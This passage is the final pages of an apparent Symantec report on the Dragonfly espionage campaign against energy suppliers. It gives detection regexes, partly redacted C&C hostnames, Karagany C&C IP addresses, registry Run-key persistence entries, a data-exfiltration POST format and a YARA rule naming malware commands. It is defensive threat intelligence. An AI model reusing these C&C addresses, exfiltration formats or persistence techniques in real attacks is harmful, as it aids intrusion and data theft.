  • 16. Page 16 Dragonfly: Cyberespionage Attacks Against Energy Suppliers Detection for HTTP request of Lightsout payload Regular expression for URL or HTTP request-line searches: • [^=]*=(dw[de]|fn[de])$ Backdoor.Oldrea Detection for Oldrea HTTP C&C requests • .php?id=[0-9A-F]{28}.{0,5}&v1=[0-9]{1,5}&v2=[0-9]{1,10}&q=[0-9A-F]{20} Detection for files created during installation Regular expression for file system searches: • (TMPprovider[0-9]{3}.dll|sy[ds]main.dll) Table 4. Recent Oldrea C&C servers detected by Symantec Hostname First Seen Last Seen a[REDACTED]e.com 25/02/2014 15:57 23/06/2014 21:06 e[REDACTED]k.ru 25/02/2014 18:47 23/06/2014 20:51 r[REDACTED]r.ru 25/02/2014 15:44 23/06/2014 17:21 l[REDACTED]l.net 25/02/2014 15:54 23/06/2014 12:51 c[REDACTED]b.ru 25/02/2014 22:37 23/06/2014 12:13 l[REDACTED]r.ru 05/03/2014 14:00 22/06/2014 22:06 p[REDACTED]3.ru 11/06/2014 03:34 22/06/2014 06:18 r[REDACTED]a.com 30/04/2014 00:07 17/06/2014 22:57 7[REDACTED]t.com 26/02/2014 09:43 13/06/2014 08:59 s[REDACTED]s.com 29/04/2014 23:43 13/06/2014 02:55 www.r[REDACTED]l.com 05/03/2014 19:18 19/03/2014 17:21 w[REDACTED]c.org 26/02/2014 04:51 11/03/2014 23:30 s[REDACTED]s.com 06/09/2013 04:03 16/01/2014 23:54 s[REDACTED]f.com.ua 14/01/2014 21:46 16/01/2014 22:49 d[REDACTED]k.com 14/01/2014 08:46 16/01/2014 22:48 z[REDACTED]k.com 14/01/2014 21:47 16/01/2014 22:47 blog.o[REDACTED]d.com 19/09/2013 07:12 16/01/2014 22:40 a[REDACTED]l.com 06/09/2013 04:41 16/01/2014 20:52 a[REDACTED]r.com 19/09/2013 01:44 15/01/2014 05:57 k[REDACTED]x.com 20/09/2013 00:22 26/09/2013 04:25 blog.k[REDACTED]x.com 20/09/2013 04:04 25/09/2013 07:57 dl.3[REDACTED]e.com 28/08/2013 06:38 06/09/2013 10:07 j[REDACTED]p.co.jp 28/08/2013 06:33 06/09/2013 09:37 s[REDACTED]e.net 28/08/2013 09:12 06/09/2013 03:54
  • 17. Page 17 Dragonfly: Cyberespionage Attacks Against Energy Suppliers Registry changes made during installation • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun”TmProvider” • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun”TmProvider” Trojan.Karagany • 91.203.6.71 • 93.171.216.118 • 93.188.161.235 Format of data initial POST request made to C&C server • identifiant=[OS VERSION]_[DERIVED NUMBER] HTTP requests for uploading data with the format: • filename=[FILE NAME]&identifiant=[INFO DERIVED FROM OS]&fichier=[ENCODED DATA FROM FILE] Yara rule Karagany Yara rule: private rule isPE { condition: uint16(0) == 0x5A4D and uint32(uint32(0x3c)) == 0x00004550 } rule Trojan _ Karagany { meta: alias = “Dreamloader” strings: $s1 = “neosphere” wide ascii $s2 = “10000000000051200” wide ascii $v1 = “&fichier” wide ascii $v2 = “&identifiant” wide ascii $c1 = “xmonstart” wide ascii $c2 = “xmonstop” wide ascii $c3 = “xgetfile” wide ascii $c4 = “downadminexec” wide ascii $c5 = “xdiex” wide ascii $c6 = “xrebootx” wide ascii condition: isPE and (($s1 and $s2) or ($v1 and $v2) or (any of ($c*))) }
  • 18. About Symantec Symantec protects the world’s information and is the global leader in security, backup, and availability solutions. Our innovative products and services protect people and information in any environment—from the smallest mobile device to the enterprise data center to cloud-based systems. Our industry-leading expertise in protecting data, identities, and interactions gives our customers confidence in a connected world. More information is available at www.symantec.com or by connecting with Symantec at go.symantec.com/socialmedia. Headquartered in Mountain View, Calif., Symantec has operations in 40 countries. More information is available at www.symantec.com. For specific country offices and contact numbers, please visit our website. Symantec World Headquarters 350 Ellis St. Mountain View, CA 94043 USA +1 (650) 527-8000 1 (800) 721-3934 www.symantec.com Copyright © 2014 Symantec Corporation. All rights reserved. Symantec, the Symantec Logo, and the Checkmark Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners. Any technical information that is made available by Symantec Corporation is the copyrighted work of Symantec Corporation and is owned by Symantec Corporation. NO WARRANTY . The technical information is being delivered to you as is and Symantec Corporation makes no warranty as to its accuracy or use. Any use of the technical documentation or the information contained herein is at the risk of the user. Documentation may include technical or other inaccuracies or typographical errors. Symantec reserves the right to make changes without prior notice. Authors Symantec Security Response